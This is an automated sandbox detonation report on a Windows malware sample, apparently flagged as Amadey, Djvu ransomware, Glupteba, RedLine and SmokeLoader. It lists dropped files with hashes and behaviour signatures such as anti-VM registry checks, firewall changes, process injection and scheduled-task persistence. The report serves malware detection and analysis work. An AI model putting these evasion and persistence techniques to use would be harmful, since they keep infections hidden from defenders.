memory/2336-142-0x0000000001DC0000-0x0000000001E52000-memory.dmp

\Users\Admin\AppData\Local\Temp\FD04.exe

MD5 3d0534c699f0f264c2ecedebb5cf3af8
SHA1 f0cb1804fe81dba82b085e51d64953a77dc5e174
SHA256 e4f573f8d774dce16cdd944525f599465be442656870081fb66f91dd2b7db230
SHA512 69d8c00bc663cea2c5deca5bdc24b59f1e82d5439676b9eb2a719902c273d5611c2cfc00b72c750411f06361b74ace3e8b16ae3c20a755418f5432479603b62d

memory/2336-154-0x0000000001DC0000-0x0000000001E52000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\FD04.exe

MD5 3d0534c699f0f264c2ecedebb5cf3af8
SHA1 f0cb1804fe81dba82b085e51d64953a77dc5e174
SHA256 e4f573f8d774dce16cdd944525f599465be442656870081fb66f91dd2b7db230
SHA512 69d8c00bc663cea2c5deca5bdc24b59f1e82d5439676b9eb2a719902c273d5611c2cfc00b72c750411f06361b74ace3e8b16ae3c20a755418f5432479603b62d

memory/1980-166-0x0000000000400000-0x000000000043E000-memory.dmp

memory/1980-167-0x0000000000400000-0x000000000043E000-memory.dmp

memory/1980-171-0x0000000000400000-0x000000000043E000-memory.dmp

memory/1980-170-0x0000000000400000-0x000000000043E000-memory.dmp

memory/1480-168-0x0000000000400000-0x0000000000D6F000-memory.dmp

memory/2784-169-0x00000000000E0000-0x000000000014B000-memory.dmp

memory/1980-173-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/1980-175-0x0000000000400000-0x000000000043E000-memory.dmp

memory/1320-177-0x0000000000400000-0x0000000000537000-memory.dmp

memory/1980-181-0x0000000000400000-0x000000000043E000-memory.dmp

memory/2520-179-0x0000000005080000-0x00000000050C0000-memory.dmp

memory/1980-178-0x0000000000400000-0x000000000043E000-memory.dmp

memory/1480-182-0x00000000025B0000-0x00000000029A8000-memory.dmp

memory/1480-183-0x00000000029B0000-0x000000000329B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CabCA13.tmp

MD5 f3441b8572aae8801c04f3060b550443
SHA1 4ef0a35436125d6821831ef36c28ffaf196cda15
SHA256 6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf
SHA512 5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 9b5a426a726f758115ea77db8fac5e82
SHA1 9245b9f3edb46fc9ef6fd87b3ae7a0ec52399345
SHA256 bcb370ca3e638e8a06c2122b3786140e21e0e8ec801e6b0402733a4182656aee
SHA512 9019bd7861bec7ccd2979fa8792cd65eb7aa0f1737ce0c372a39dcf4940cccc3893e8bf9780bdef7760aa38ed3189ca5c53bed0df5d71df1d9c1671df6705385

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

MD5 8202a1cd02e7d69597995cabbe881a12
SHA1 8858d9d934b7aa9330ee73de6c476acf19929ff6
SHA256 58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5
SHA512 97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

MD5 0eabcbc7345ebf33e9de3c443923ea07
SHA1 5d0afb56e8ceacff9bd5a13c831ecdbc38192f23
SHA256 89906f810de938045610b1fd48c1993ef7571c0270285ed6ef1f038908dabda9
SHA512 87edc532180e200cf2b7861d2920db1044ad38ed0367777cd19536c5b393d02578c0e6548dfcfd79a947528c12e6e2120a1c399106aaff010fe92b8932c28986

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

MD5 0268ef551139ac7672a96e6658ce044a
SHA1 b005ca526faa872c8e0aeafd11e3335c28c16037
SHA256 417ec67ee533de68e2008cc547552d33878e0d9bedd6ceaf5572d37112bb036a
SHA512 5405872c99f9f88596d39057d8701ba360b498d8bbb5eb64cd5af5f8f1100e0ecdaf09ad811aa0b3fc92ddfcef05d1a14e6495868e4995af049cd3be0247860d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

MD5 d52f0c3ce546cde61703a1b1b8fcca6a
SHA1 4ffe15c2ae6b48606b7dc6b5d3051a73be04f2db
SHA256 f3ea7e39f0a39b53e2b282dd3d2a32756bb3b69150e41ad67d4020e19204ec92
SHA512 9c48b9abe5bfcc43f6b4e700b1e62ed4d83490c16c7dd69d49ebc4ee8080b3ca08601d67b363749e0247d97bca7fc6fd941d750d92427cdfc9d6a239d06bc0e5

memory/1860-199-0x0000000000400000-0x0000000000D6F000-memory.dmp

memory/1320-202-0x0000000000400000-0x0000000000537000-memory.dmp

memory/1980-203-0x0000000074C00000-0x00000000752EE000-memory.dmp

memory/2520-205-0x0000000005080000-0x00000000050C0000-memory.dmp

memory/1980-207-0x0000000074C00000-0x00000000752EE000-memory.dmp

memory/1980-210-0x0000000007320000-0x0000000007360000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\4272.exe

MD5 71b9cd84ec146c642e076dfb2a87c31a
SHA1 18f593471c238beb864de6425c0343cbb0ea8597
SHA256 19c9a046edef05ab14dcb86a46de9361190b07b0ef628771a00a36564192d309
SHA512 af8402aa35dc3f2fd112359c0a34187756e258f96f67775513b7df2ddaf0f0b7887f730b877ba16ccd8fa5f95f54a47355dacc226f5c6c5cdf2aa7b596a6872c

memory/2520-213-0x0000000000490000-0x00000000004AC000-memory.dmp

memory/1320-214-0x0000000000400000-0x0000000000537000-memory.dmp

memory/1320-215-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2520-216-0x0000000000490000-0x00000000004A5000-memory.dmp

memory/2520-219-0x0000000000490000-0x00000000004A5000-memory.dmp

memory/2520-217-0x0000000000490000-0x00000000004A5000-memory.dmp

memory/2520-221-0x0000000000490000-0x00000000004A5000-memory.dmp

memory/2520-223-0x0000000000490000-0x00000000004A5000-memory.dmp

memory/2520-225-0x0000000000490000-0x00000000004A5000-memory.dmp

memory/2520-240-0x00000000004C0000-0x00000000004C1000-memory.dmp

memory/2712-252-0x0000000074C00000-0x00000000752EE000-memory.dmp

memory/2712-251-0x0000000000400000-0x000000000045A000-memory.dmp

memory/2520-253-0x0000000005080000-0x00000000050C0000-memory.dmp

memory/2712-254-0x0000000002410000-0x0000000002450000-memory.dmp

memory/2520-256-0x00000000759A0000-0x0000000075AB0000-memory.dmp

memory/2520-257-0x00000000759A0000-0x0000000075AB0000-memory.dmp

memory/2520-258-0x00000000759A0000-0x0000000075AB0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\4272.exe

MD5 71b9cd84ec146c642e076dfb2a87c31a
SHA1 18f593471c238beb864de6425c0343cbb0ea8597
SHA256 19c9a046edef05ab14dcb86a46de9361190b07b0ef628771a00a36564192d309
SHA512 af8402aa35dc3f2fd112359c0a34187756e258f96f67775513b7df2ddaf0f0b7887f730b877ba16ccd8fa5f95f54a47355dacc226f5c6c5cdf2aa7b596a6872c

\Users\Admin\AppData\Local\34c87081-bcc2-466e-9a99-2a915e5105bd\build2.exe

MD5 8012f0388cdda7870e63a5723ff24e9b
SHA1 08ed4dc8ded91f4aa23324b7eac56a22a883005d
SHA256 5f44375ddddaedfcd4f2499d3e121b7d9ee627b751f2d0914a562d35d7c9a551
SHA512 f59ce84fd7a3762efb919bb8474226fdb99765f80e4a40a9a66764a1502150fe40804be5363caeda6d27fdcfe44e5897a8c624db9993c2c890d83bbb660c01d3

C:\Users\Admin\AppData\Local\34c87081-bcc2-466e-9a99-2a915e5105bd\build2.exe

MD5 8012f0388cdda7870e63a5723ff24e9b
SHA1 08ed4dc8ded91f4aa23324b7eac56a22a883005d
SHA256 5f44375ddddaedfcd4f2499d3e121b7d9ee627b751f2d0914a562d35d7c9a551
SHA512 f59ce84fd7a3762efb919bb8474226fdb99765f80e4a40a9a66764a1502150fe40804be5363caeda6d27fdcfe44e5897a8c624db9993c2c890d83bbb660c01d3

C:\Users\Admin\AppData\Local\34c87081-bcc2-466e-9a99-2a915e5105bd\build2.exe

MD5 8012f0388cdda7870e63a5723ff24e9b
SHA1 08ed4dc8ded91f4aa23324b7eac56a22a883005d
SHA256 5f44375ddddaedfcd4f2499d3e121b7d9ee627b751f2d0914a562d35d7c9a551
SHA512 f59ce84fd7a3762efb919bb8474226fdb99765f80e4a40a9a66764a1502150fe40804be5363caeda6d27fdcfe44e5897a8c624db9993c2c890d83bbb660c01d3

\Users\Admin\AppData\Local\34c87081-bcc2-466e-9a99-2a915e5105bd\build2.exe

MD5 8012f0388cdda7870e63a5723ff24e9b
SHA1 08ed4dc8ded91f4aa23324b7eac56a22a883005d
SHA256 5f44375ddddaedfcd4f2499d3e121b7d9ee627b751f2d0914a562d35d7c9a551
SHA512 f59ce84fd7a3762efb919bb8474226fdb99765f80e4a40a9a66764a1502150fe40804be5363caeda6d27fdcfe44e5897a8c624db9993c2c890d83bbb660c01d3

\Windows\rss\csrss.exe

MD5 71b9cd84ec146c642e076dfb2a87c31a
SHA1 18f593471c238beb864de6425c0343cbb0ea8597
SHA256 19c9a046edef05ab14dcb86a46de9361190b07b0ef628771a00a36564192d309
SHA512 af8402aa35dc3f2fd112359c0a34187756e258f96f67775513b7df2ddaf0f0b7887f730b877ba16ccd8fa5f95f54a47355dacc226f5c6c5cdf2aa7b596a6872c

\Windows\rss\csrss.exe

MD5 71b9cd84ec146c642e076dfb2a87c31a
SHA1 18f593471c238beb864de6425c0343cbb0ea8597
SHA256 19c9a046edef05ab14dcb86a46de9361190b07b0ef628771a00a36564192d309
SHA512 af8402aa35dc3f2fd112359c0a34187756e258f96f67775513b7df2ddaf0f0b7887f730b877ba16ccd8fa5f95f54a47355dacc226f5c6c5cdf2aa7b596a6872c

C:\Windows\rss\csrss.exe

MD5 71b9cd84ec146c642e076dfb2a87c31a
SHA1 18f593471c238beb864de6425c0343cbb0ea8597
SHA256 19c9a046edef05ab14dcb86a46de9361190b07b0ef628771a00a36564192d309
SHA512 af8402aa35dc3f2fd112359c0a34187756e258f96f67775513b7df2ddaf0f0b7887f730b877ba16ccd8fa5f95f54a47355dacc226f5c6c5cdf2aa7b596a6872c

C:\Users\Admin\AppData\Local\34c87081-bcc2-466e-9a99-2a915e5105bd\build2.exe

MD5 8012f0388cdda7870e63a5723ff24e9b
SHA1 08ed4dc8ded91f4aa23324b7eac56a22a883005d
SHA256 5f44375ddddaedfcd4f2499d3e121b7d9ee627b751f2d0914a562d35d7c9a551
SHA512 f59ce84fd7a3762efb919bb8474226fdb99765f80e4a40a9a66764a1502150fe40804be5363caeda6d27fdcfe44e5897a8c624db9993c2c890d83bbb660c01d3

C:\Users\Admin\AppData\Local\34c87081-bcc2-466e-9a99-2a915e5105bd\build2.exe

MD5 8012f0388cdda7870e63a5723ff24e9b
SHA1 08ed4dc8ded91f4aa23324b7eac56a22a883005d
SHA256 5f44375ddddaedfcd4f2499d3e121b7d9ee627b751f2d0914a562d35d7c9a551
SHA512 f59ce84fd7a3762efb919bb8474226fdb99765f80e4a40a9a66764a1502150fe40804be5363caeda6d27fdcfe44e5897a8c624db9993c2c890d83bbb660c01d3

C:\Windows\rss\csrss.exe

MD5 71b9cd84ec146c642e076dfb2a87c31a
SHA1 18f593471c238beb864de6425c0343cbb0ea8597
SHA256 19c9a046edef05ab14dcb86a46de9361190b07b0ef628771a00a36564192d309
SHA512 af8402aa35dc3f2fd112359c0a34187756e258f96f67775513b7df2ddaf0f0b7887f730b877ba16ccd8fa5f95f54a47355dacc226f5c6c5cdf2aa7b596a6872c

C:\Users\Admin\AppData\Local\Temp\Tar4442.tmp

MD5 9441737383d21192400eca82fda910ec
SHA1 725e0d606a4fc9ba44aa8ffde65bed15e65367e4
SHA256 bc3a6e84e41faeb57e7c21aa3b60c2a64777107009727c5b7c0ed8fe658909e5
SHA512 7608dd653a66cd364392a78d4711b48d1707768d36996e4d38871c6843b5714e1d7da4b4cc6db969e6000cfa182bcb74216ef6823d1063f036fc5c3413fb8dcf

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 a266bb7dcc38a562631361bbf61dd11b
SHA1 3b1efd3a66ea28b16697394703a72ca340a05bd5
SHA256 df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
SHA512 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 7ca1c62f562ccca914a8890091b90a43
SHA1 9983014fe48f89f44ec634fab0a290df1bc88fb7
SHA256 10b7fdd7477b1a6329d4c65d8d91bdfb4224dbeb904a958b9baf40e75660bf08
SHA512 4b27fcc2b3754328c1beed8b8816312cc4b9efa458cd26ca155943e21fd633282564bb2647dabde67b3aad3c56a412eb2068fa0bbfaacb817bbbea2310772729

\Users\Admin\AppData\Local\34c87081-bcc2-466e-9a99-2a915e5105bd\build3.exe

MD5 41b883a061c95e9b9cb17d4ca50de770
SHA1 1daf96ec21d53d9a4699cea9b4db08cda6fbb5ad
SHA256 fef2c8ca07c500e416fd7700a381c39899ee26ce1119f62e7c65cf922ce8b408
SHA512 cdd1bb3a36182575cd715a52815765161eeaa3849e72c1c2a9a4e84cc43af9f8ec4997e642702bb3de41f162d2e8fd8717f6f8302bba5306821ee4d155626319

C:\Users\Admin\AppData\Local\34c87081-bcc2-466e-9a99-2a915e5105bd\build3.exe

MD5 41b883a061c95e9b9cb17d4ca50de770
SHA1 1daf96ec21d53d9a4699cea9b4db08cda6fbb5ad
SHA256 fef2c8ca07c500e416fd7700a381c39899ee26ce1119f62e7c65cf922ce8b408
SHA512 cdd1bb3a36182575cd715a52815765161eeaa3849e72c1c2a9a4e84cc43af9f8ec4997e642702bb3de41f162d2e8fd8717f6f8302bba5306821ee4d155626319

\Users\Admin\AppData\Local\34c87081-bcc2-466e-9a99-2a915e5105bd\build3.exe

MD5 41b883a061c95e9b9cb17d4ca50de770
SHA1 1daf96ec21d53d9a4699cea9b4db08cda6fbb5ad
SHA256 fef2c8ca07c500e416fd7700a381c39899ee26ce1119f62e7c65cf922ce8b408
SHA512 cdd1bb3a36182575cd715a52815765161eeaa3849e72c1c2a9a4e84cc43af9f8ec4997e642702bb3de41f162d2e8fd8717f6f8302bba5306821ee4d155626319

C:\Users\Admin\AppData\Local\34c87081-bcc2-466e-9a99-2a915e5105bd\build3.exe

MD5 41b883a061c95e9b9cb17d4ca50de770
SHA1 1daf96ec21d53d9a4699cea9b4db08cda6fbb5ad
SHA256 fef2c8ca07c500e416fd7700a381c39899ee26ce1119f62e7c65cf922ce8b408
SHA512 cdd1bb3a36182575cd715a52815765161eeaa3849e72c1c2a9a4e84cc43af9f8ec4997e642702bb3de41f162d2e8fd8717f6f8302bba5306821ee4d155626319

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 d98e33b66343e7c96158444127a117f6
SHA1 bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA256 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 d98e33b66343e7c96158444127a117f6
SHA1 bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA256 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

C:\Users\Admin\AppData\Local\34c87081-bcc2-466e-9a99-2a915e5105bd\build3.exe

MD5 41b883a061c95e9b9cb17d4ca50de770
SHA1 1daf96ec21d53d9a4699cea9b4db08cda6fbb5ad
SHA256 fef2c8ca07c500e416fd7700a381c39899ee26ce1119f62e7c65cf922ce8b408
SHA512 cdd1bb3a36182575cd715a52815765161eeaa3849e72c1c2a9a4e84cc43af9f8ec4997e642702bb3de41f162d2e8fd8717f6f8302bba5306821ee4d155626319

C:\Users\Admin\AppData\Local\34c87081-bcc2-466e-9a99-2a915e5105bd\build3.exe

MD5 41b883a061c95e9b9cb17d4ca50de770
SHA1 1daf96ec21d53d9a4699cea9b4db08cda6fbb5ad
SHA256 fef2c8ca07c500e416fd7700a381c39899ee26ce1119f62e7c65cf922ce8b408
SHA512 cdd1bb3a36182575cd715a52815765161eeaa3849e72c1c2a9a4e84cc43af9f8ec4997e642702bb3de41f162d2e8fd8717f6f8302bba5306821ee4d155626319

\Users\Admin\AppData\Local\Temp\csrss\patch.exe

MD5 13aaafe14eb60d6a718230e82c671d57
SHA1 e039dd924d12f264521b8e689426fb7ca95a0a7b
SHA256 f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3
SHA512 ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

MD5 13aaafe14eb60d6a718230e82c671d57
SHA1 e039dd924d12f264521b8e689426fb7ca95a0a7b
SHA256 f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3
SHA512 ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

\ProgramData\nss3.dll

MD5 1cc453cdf74f31e4d913ff9c10acdde2
SHA1 6e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256 ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512 dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

\ProgramData\mozglue.dll

MD5 c8fd9be83bc728cc04beffafc2907fe9
SHA1 95ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256 ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512 fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

MD5 cb666f7e514673ecc3185691ee8ff894
SHA1 72e4f07ba2adeb22e9924cc567c6a4a4c22ade5a
SHA256 46af5c4a4bdf2fa33d9f78df3f1867c53360484be50f51190f10acd13e0b1f9a
SHA512 abd9bb6fc37d5a454a58e3b9f383cfd5f70e0eff22f462553b32d74f9a9b6f8de068e470ee83c4d7d16830b6dfbfc0145ee3b2b9eeebd3af46fef8b564df1ae9

Analysis: behavioral2

Detonation Overview

Submitted

2023-10-17 16:49

Reported

2023-10-17 16:53

Platform

win10v2004-20230915-en

Max time kernel

43s

Max time network

148s

Command Line

"C:\Users\Admin\AppData\Local\Temp\NEAS.NEAS2555138d315fe335a9cc77ad2c3f8b0bbd0e066f38db784774b26ba2537a0900exeexe_JC.exe"

Signatures

Amadey

trojan amadey

Detected Djvu ransomware

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Djvu Ransomware

ransomware djvu

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\44D5.exe N/A

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\44D5.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\44D5.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\System32\powercfg.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\44D5.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.2ip.ua N/A N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\44D5.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3764 set thread context of 864 N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\40DC.exe

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\40DC.exe

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\NEAS.NEAS2555138d315fe335a9cc77ad2c3f8b0bbd0e066f38db784774b26ba2537a0900exeexe_JC.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\NEAS.NEAS2555138d315fe335a9cc77ad2c3f8b0bbd0e066f38db784774b26ba2537a0900exeexe_JC.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\NEAS.NEAS2555138d315fe335a9cc77ad2c3f8b0bbd0e066f38db784774b26ba2537a0900exeexe_JC.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\NEAS.NEAS2555138d315fe335a9cc77ad2c3f8b0bbd0e066f38db784774b26ba2537a0900exeexe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\NEAS.NEAS2555138d315fe335a9cc77ad2c3f8b0bbd0e066f38db784774b26ba2537a0900exeexe_JC.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\NEAS.NEAS2555138d315fe335a9cc77ad2c3f8b0bbd0e066f38db784774b26ba2537a0900exeexe_JC.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3144 wrote to memory of 3764 N/A N/A C:\Users\Admin\AppData\Local\Temp\40DC.exe
PID 3144 wrote to memory of 3764 N/A N/A C:\Users\Admin\AppData\Local\Temp\40DC.exe
PID 3144 wrote to memory of 3764 N/A N/A C:\Users\Admin\AppData\Local\Temp\40DC.exe
PID 3144 wrote to memory of 3712 N/A N/A C:\Users\Admin\AppData\Local\Temp\44D5.exe
PID 3144 wrote to memory of 3712 N/A N/A C:\Users\Admin\AppData\Local\Temp\44D5.exe
PID 3144 wrote to memory of 3712 N/A N/A C:\Users\Admin\AppData\Local\Temp\44D5.exe
PID 3764 wrote to memory of 864 N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\40DC.exe
PID 3764 wrote to memory of 864 N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\40DC.exe
PID 3764 wrote to memory of 864 N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\40DC.exe
PID 3764 wrote to memory of 864 N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\40DC.exe
PID 3764 wrote to memory of 864 N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\40DC.exe
PID 3764 wrote to memory of 864 N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\40DC.exe
PID 3764 wrote to memory of 864 N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\40DC.exe
PID 3764 wrote to memory of 864 N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\40DC.exe
PID 3764 wrote to memory of 864 N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\40DC.exe
PID 3764 wrote to memory of 864 N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\40DC.exe
PID 3144 wrote to memory of 3724 N/A N/A C:\Windows\system32\regsvr32.exe
PID 3144 wrote to memory of 3724 N/A N/A C:\Windows\system32\regsvr32.exe
PID 3144 wrote to memory of 1832 N/A N/A C:\Users\Admin\AppData\Local\Temp\497B.exe
PID 3144 wrote to memory of 1832 N/A N/A C:\Users\Admin\AppData\Local\Temp\497B.exe
PID 3144 wrote to memory of 1832 N/A N/A C:\Users\Admin\AppData\Local\Temp\497B.exe
PID 3724 wrote to memory of 4300 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 3724 wrote to memory of 4300 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 3724 wrote to memory of 4300 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe

Uses Task Scheduler COM API

persistence

Processes

